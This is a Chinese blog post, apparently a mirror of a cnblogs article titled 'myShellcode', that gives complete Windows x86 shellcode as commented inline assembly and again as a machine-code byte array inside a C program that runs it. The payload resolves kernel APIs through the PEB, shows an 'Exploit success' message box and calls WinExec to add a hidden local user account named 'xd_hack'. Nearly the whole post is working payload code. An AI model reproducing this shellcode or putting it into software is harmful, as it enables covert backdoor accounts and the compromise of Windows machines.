zoukankan      html  css  js  c++  java
  • myShellcode

    #include <stdio.h>
    //#include <WINDOWS.H>
    #include <string.h>
    
    void main(int argc, char **argv)
    {
        _asm
        {
            push ebp    //压入ebp
            mov ebp,esp 
            sub esp,0x28   //申请10*4个空间保存临时结果
    //------------------------------------------------------------------------
    
                //找到kernel32.dll的基地址,本机为0x7C800000
                push ebp
                mov ebp,esp
                xor ecx,ecx
                mov esi,fs:0x30
                mov esi,[esi + 0x0C]
                mov esi,[esi + 0x1C]
    next_module:
                mov ebp,[esi + 0x08]
                mov edi,[esi + 0x20]
                mov esi,[esi]
                cmp [edi+0x18],cl
                jne next_module
                mov edi,ebp            //baseAddr  of Kernel32.dll
                pop ebp
    //------------------------------------------------------------------------
    //保存kernel32.dll的基地址,用于查找其他API
            mov [ebp - 0xC],edi               //找到kernel32.dll的基地址,本机为0x7C800000
    //------------------------------------------------------------------------
                mov eax,[edi + 3ch]              //IMAGE_DOS_HEADER->e_lfanew
                mov edx,[edi + eax + 78h]         //_IMAGE_OPTIONAL_HEADER->IMAGE_DATA_DIRECTORY->VirtualAddress  导出表的RVA
                add edx,edi                       //_IMAGE_EXPORT_DIRECTORY导出表的首地址
                mov ecx,[edx +  18h]               //_IMAGE_EXPORT_DIRECTORY->NumberOfNames
                mov ebx,[edx + 20h]                 //_IMAGE_EXPORT_DIRECTORY->AddressOfNames
                add ebx,edi                      //AddressOfName            
    search:
                dec ecx
                mov esi,[ebx+ecx*4]
                add esi,edi
                mov eax,0x50746547              //PteG("GetP")
                cmp [esi],eax
                jne search
                mov eax,0x41636f72              //Acor("rocA")
                cmp [esi+4],eax
                jne search
                mov ebx,[edx + 24h]
                add ebx,edi;                     //index address
                mov cx,[ebx + ecx*2]
                mov ebx,[edx + 1ch]
                add ebx,edi
                mov eax,[ebx + ecx*4]
                add eax,edi
    //------------------------------------------------------------------------
    //保存GetProcAddress的地址   其值为:0x7C80 AE30
            mov [ebp-0x8],eax
    //------------------------------------------------------------------------
                //找到LoadLibraryA的地址
                mov edi,[ebp -  0xC]    //获得kernel32.dll的基地址
                mov eax,[edi + 3ch]              //IMAGE_DOS_HEADER->e_lfanew
                mov edx,[edi + eax + 78h]         //_IMAGE_OPTIONAL_HEADER->IMAGE_DATA_DIRECTORY->VirtualAddress  导出表的RVA
                add edx,edi                       //_IMAGE_EXPORT_DIRECTORY导出表的首地址
                mov ecx,[edx +  18h]               //_IMAGE_EXPORT_DIRECTORY->NumberOfNames
                mov ebx,[edx + 20h]                 //_IMAGE_EXPORT_DIRECTORY->AddressOfNames
                add ebx,edi                      //AddressOfName
    find_loadlibrary:
                dec ecx
                mov esi,[ebx + ecx*4]
                add esi,edi;
                mov eax,0x64616F4C              //Load("daoL")
                cmp [esi],eax
                jne find_loadlibrary
                mov eax,0x7262694C              //Libr("rbiL")
                cmp [esi+4],eax
                jne find_loadlibrary
                mov eax,0x41797261               //aryA("Ayra")
                cmp [esi+8],eax
                jne find_loadlibrary
                mov ebx,[edx+24h]
                add ebx,edi;                     //index address
                mov cx,[ebx+ecx*2]
                mov ebx,[edx+1ch]
                add ebx,edi
                mov eax,[ebx+ecx*4]
                add eax,edi                      //eax 中保存LoadLibrary的地址
    //------------------------------------------------------------------------
    //保存LoadLibraryA的地址 本机值为0x7c801d7b
            mov [ebp - 0x4],eax
    //------------------------------------------------------------------------
                //LoadLibraryA("user32.dll")
    
                mov eax,[ebp-0x4]
    
                push ebp
                mov ebp,esp
                xor ebx,ebx
                push ebx
                push ebx
                push ebx
                mov byte ptr[ebp-0xC],0x75           // 75 73 65 72 33 32 2E 64 6C 6C
                mov byte ptr[ebp-0xB],0x73
                mov byte ptr[ebp-0xA],0x65
                mov byte ptr[ebp-0x9],0x72
                mov byte ptr[ebp-0x8],0x33
                mov byte ptr[ebp-0x7],0x32
                mov byte ptr[ebp-0x6],0x2E
                mov byte ptr[ebp-0x5],0x64
                mov byte ptr[ebp-0x4],0x6C
                mov byte ptr[ebp-0x3],0x6C
                lea ebx,[ebp-0xC]
                push ebx                 //push "user32.dll"
                call eax
                add esp,0xC
                pop ebp
    //------------------------------------------------------------------------
    //保存user32.dll 的HMODULE
            mov [ebp-0x18],eax
    //------------------------------------------------------------------------
                mov eax,[ebp-0x18]  //user32.dll->hModule
                mov edx,[ebp-0x8]   //edx->GetProcAddress
                //获得MessageBoxA的地址
                push ebp
                mov ebp,esp
                //edx->GetProcAddress(user32.dll->eax,MessageBoxA->ebx)
                xor ebx,ebx
                push ebx
                push ebx
                push ebx      // 4D 65 73 73 61 67 65 42 6F 78 41
                mov byte ptr[ebp-0xc],0x4D
                mov byte ptr[ebp-0xb],0x65
                mov byte ptr[ebp-0xa],0x73
                mov byte ptr[ebp-0x9],0x73
                mov byte ptr[ebp-0x8],0x61
                mov byte ptr[ebp-0x7],0x67
                mov byte ptr[ebp-0x6],0x65
                mov byte ptr[ebp-0x5],0x42
                mov byte ptr[ebp-0x4],0x6F
                mov byte ptr[ebp-0x3],0x78
                mov byte ptr[ebp-0x2],0x41
                lea ebx,[ebp-0xc]
                push ebx
                push eax
                call edx
                add esp,0xC
                pop ebp
    //------------------------------------------------------------------------
    //保存MessageBoxA的地址 本机为77D507EA
            mov [ebp-0x1c],eax
    //------------------------------------------------------------------------
                //弹出一个消息框 MessageBoxA(0,"Exploit success","Overflow",0)
                push ebp
                mov ebp,esp
                xor ebx,ebx
                xor edx,edx
                push ebx
                push ebx
                push ebx
                push ebx
                push ebx  // 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73
                mov byte ptr[ebp-0x10],0x45
                mov byte ptr[ebp-0x0f],0x78
                mov byte ptr[ebp-0xe],0x70
                mov byte ptr[ebp-0xd],0x6C
                mov byte ptr[ebp-0xc],0x6f
                mov byte ptr[ebp-0xb],0x69
                mov byte ptr[ebp-0xa],0x74
                mov byte ptr[ebp-0x9],0x20
                mov byte ptr[ebp-0x8],0x73
                mov byte ptr[ebp-0x7],0x75
                mov byte ptr[ebp-0x6],0x63
                mov byte ptr[ebp-0x5],0x63
                mov byte ptr[ebp-0x4],0x65
                mov byte ptr[ebp-0x3],0x73
                mov byte ptr[ebp-0x2],0x73
                lea ebx,[ebp-0x10]
                //push "Overflow"
                push 0x776F6C66
                push 0x7265764F
                mov edx,esp
                //MessageBoxA(0,ebx,edx,0)
                push 0
                push edx
                push ebx
                push 0
                call eax
                add esp,0x1c
                pop ebp
    //------------------------------------------------------------------------
            //求WinExec的地址
            //eax->GetProcAddress(edx->kernel32.dll,ebx->WinExec)
            mov eax,[ebp-0x8]
            mov edx,[ebp-0xc]
            push ebp
            mov ebp,esp
            xor ebx,ebx
            push ebx
            push ebx  // 57 69 6E 45 78 65 63
            mov byte ptr[ebp-0x8],0x57
            mov byte ptr[ebp-0x7],0x69
            mov byte ptr[ebp-0x6],0x6e
            mov byte ptr[ebp-0x5],0x45
            mov byte ptr[ebp-0x4],0x78
            mov byte ptr[ebp-0x3],0x65
            mov byte ptr[ebp-0x2],0x63
            lea ebx,[ebp-0x8]
            push ebx
            push edx
            call eax
            add esp,0x08
            pop ebp
    //------------------------------------------------------------------------
    //保存WinExec的地址    
            mov [ebp-0x10],eax
    //------------------------------------------------------------------------
                //WinExec("net user xd_hack success /add",SW_HIDE)
                mov eax,[ebp-0x10]
                push ebp
                mov ebp,esp
                xor ebx,ebx
                push ebx
                push ebx
                push ebx
                push ebx
                push ebx
                push ebx
                push ebx
                push ebx  // 6E 65 74 20 75 73 65 72 20 78 64 5F 68 61 63 6B 20 73 75 63 63 65 73 73 20 2F 61 64 64
                mov byte ptr[ebp-0x20],0x6E
                mov byte ptr[ebp-0x1f],0x65
                mov byte ptr[ebp-0x1e],0x74
                mov byte ptr[ebp-0x1d],0x20
                mov byte ptr[ebp-0x1c],0x75
                mov byte ptr[ebp-0x1b],0x73
                mov byte ptr[ebp-0x1a],0x65
                mov byte ptr[ebp-0x19],0x72
                mov byte ptr[ebp-0x18],0x20
                mov byte ptr[ebp-0x17],0x78
                mov byte ptr[ebp-0x16],0x64
                mov byte ptr[ebp-0x15],0x5f
                mov byte ptr[ebp-0x14],0x68
                mov byte ptr[ebp-0x13],0x61
                mov byte ptr[ebp-0x12],0x63
                mov byte ptr[ebp-0x11],0x6b
                mov byte ptr[ebp-0x10],0x20
                mov byte ptr[ebp-0x0f],0x73
                mov byte ptr[ebp-0x0e],0x75
                mov byte ptr[ebp-0x0d],0x63
                mov byte ptr[ebp-0x0c],0x63
                mov byte ptr[ebp-0x0b],0x65
                mov byte ptr[ebp-0x0a],0x73
                mov byte ptr[ebp-0x09],0x73
                mov byte ptr[ebp-0x08],0x20
                mov byte ptr[ebp-0x07],0x2f
                mov byte ptr[ebp-0x06],0x61
                mov byte ptr[ebp-0x05],0x64
                mov byte ptr[ebp-0x04],0x64
                lea ebx,[ebp-0x20]
                push 0
                push ebx
                call eax
                add esp,0x20
                pop ebp
    //------------------------------------------------------------------------
                //求ExitProcess的地址
                //eax->GetProcAddress(edx->kernel32.dll,ebx->ExitProcess)
                mov eax,[ebp-0x8]
                mov edx,[ebp-0xc]
                push ebp
                mov ebp,esp
                xor ebx,ebx
                push ebx
                push ebx
                push ebx  // 45 78 69 74 50 72 6F 63 65 73 73
                mov byte ptr[ebp-0xc],0x45
                mov byte ptr[ebp-0xb],0x78
                mov byte ptr[ebp-0xa],0x69
                mov byte ptr[ebp-0x9],0x74
                mov byte ptr[ebp-0x8],0x50
                mov byte ptr[ebp-0x7],0x72
                mov byte ptr[ebp-0x6],0x6f
                mov byte ptr[ebp-0x5],0x63
                mov byte ptr[ebp-0x4],0x65
                mov byte ptr[ebp-0x3],0x73
                mov byte ptr[ebp-0x2],0x73
                lea ebx,[ebp-0xc]
                push ebx
                push edx
                call eax
                add esp,0xc
                pop ebp
    //------------------------------------------------------------------------
    //退出程序
                //平衡最开始申请的堆栈空间
                add esp,0x28
                pop ebp
    
                push 0
                call eax
    //------------------------------------------------------------------------
            //add esp,0x28   //堆栈平衡
            //pop ebp     //弹出ebp
        }
    }

    对应的机器码

    #include <stdio.h>    //printf
    #include <string.h>   //strlen
     
    char shellcode[] =
    "\x55\x8B\xEC\x83\xEC\x28\x55\x8B\xEC\x33\xC9\x64\x8B"
    "\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08\x8B\x7E\x20\x8B\x36"
    "\x38\x4F\x18\x75\xF3\x8B\xFD\x5D\x89\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03"
    "\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF\x49\x8B\x34\x8B\x03\xF7\xB8\x47\x65\x74"
    "\x50\x39\x06\x75\xF1\xB8\x72\x6F\x63\x41\x39\x46\x04\x75\xE7\x8B\x5A\x24\x03"
    "\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xF8\x8B"
    "\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF"
    "\x49\x8B\x34\x8B\x03\xF7\xB8\x4C\x6F\x61\x64\x39\x06\x75\xF1\xB8\x4C\x69\x62"
    "\x72\x39\x46\x04\x75\xE7\xB8\x61\x72\x79\x41\x39\x46\x08\x75\xDD\x8B\x5A\x24"
    "\x03\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xFC"
    "\x8B\x45\xFC\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x75\xC6\x45\xF5\x73"
    "\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x33\xC6\x45\xF9\x32\xC6\x45\xFA"
    "\x2E\xC6\x45\xFB\x64\xC6\x45\xFC\x6C\xC6\x45\xFD\x6C\x8D\x5D\xF4\x53\xFF\xD0"
    "\x83\xC4\x0C\x5D\x89\x45\xE8\x8B\x45\xE8\x8B\x55\xF8\x55\x8B\xEC\x33\xDB\x53"
    "\x53\x53\xC6\x45\xF4\x4D\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6\x45\xF7\x73\xC6"
    "\x45\xF8\x61\xC6\x45\xF9\x67\xC6\x45\xFA\x65\xC6\x45\xFB\x42\xC6\x45\xFC\x6F"
    "\xC6\x45\xFD\x78\xC6\x45\xFE\x41\x8D\x5D\xF4\x53\x50\xFF\xD2\x83\xC4\x0C\x5D"
    "\x89\x45\xE4\x55\x8B\xEC\x33\xDB\x33\xD2\x53\x53\x53\x53\x53\xC6\x45\xF0\x45"
    "\xC6\x45\xF1\x78\xC6\x45\xF2\x70\xC6\x45\xF3\x6C\xC6\x45\xF4\x6F\xC6\x45\xF5"
    "\x69\xC6\x45\xF6\x74\xC6\x45\xF7\x20\xC6\x45\xF8\x73\xC6\x45\xF9\x75\xC6\x45"
    "\xFA\x63\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D"
    "\x5D\xF0\x68\x66\x6C\x6F\x77\x68\x4F\x76\x65\x72\x8B\xD4\x6A\x00\x52\x53\x6A"
    "\x00\xFF\xD0\x83\xC4\x1C\x5D\x8B\x45\xF8\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53"
    "\x53\xC6\x45\xF8\x57\xC6\x45\xF9\x69\xC6\x45\xFA\x6E\xC6\x45\xFB\x45\xC6\x45"
    "\xFC\x78\xC6\x45\xFD\x65\xC6\x45\xFE\x63\x8D\x5D\xF8\x53\x52\xFF\xD0\x83\xC4"
    "\x08\x5D\x89\x45\xF0\x8B\x45\xF0\x55\x8B\xEC\x33\xDB\x53\x53\x53\x53\x53\x53"
    "\x53\x53\xC6\x45\xE0\x6E\xC6\x45\xE1\x65\xC6\x45\xE2\x74\xC6\x45\xE3\x20\xC6"
    "\x45\xE4\x75\xC6\x45\xE5\x73\xC6\x45\xE6\x65\xC6\x45\xE7\x72\xC6\x45\xE8\x20"
    "\xC6\x45\xE9\x78\xC6\x45\xEA\x64\xC6\x45\xEB\x5F\xC6\x45\xEC\x68\xC6\x45\xED"
    "\x61\xC6\x45\xEE\x63\xC6\x45\xEF\x6B\xC6\x45\xF0\x20\xC6\x45\xF1\x73\xC6\x45"
    "\xF2\x75\xC6\x45\xF3\x63\xC6\x45\xF4\x63\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6"
    "\x45\xF7\x73\xC6\x45\xF8\x20\xC6\x45\xF9\x2F\xC6\x45\xFA\x61\xC6\x45\xFB\x64"
    "\xC6\x45\xFC\x64\x8D\x5D\xE0\x6A\x00\x53\xFF\xD0\x83\xC4\x20\x5D\x8B\x45\xF8"
    "\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x45\xC6\x45\xF5\x78"
    "\xC6\x45\xF6\x69\xC6\x45\xF7\x74\xC6\x45\xF8\x50\xC6\x45\xF9\x72\xC6\x45\xFA"
    "\x6F\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D\x5D"
    "\xF4\x53\x52\xFF\xD0\x83\xC4\x0C\x5D\x83\xC4\x28\x5D\x6A\x00\xFF\xD0\x5F\x5E"
    "\x5B\x5D\xC3";
     
    int main(int argc, char **argv)
    {
       int (*func)();
       func = (int (*)()) &shellcode;
       printf("Shellcode Length is : %x \n",strlen(shellcode));
       (int)(*func)(); 
    }

    返回长度不对,实际长度为

    700个字节。

  • 相关阅读:
    React 创建一个自动跟新时间的组件
    React 组件传值 父传递儿子
    React 以两种形式去创建组件 类或者函数(二)
    React 语法基础(一)之表达式和jsx
    ref的使用
    使用scale等比例缩放图片
    Vue动态加载图片图片不显示
    div里面的元素在【垂直 方向】上水平分布 使用calc()函数动态计算
    控制label标签的宽度,不让它换行 label标签左对齐
    表单验证
  • 原文地址:https://www.cnblogs.com/tk091/p/2740094.html
Copyright © 2011-2022 走看看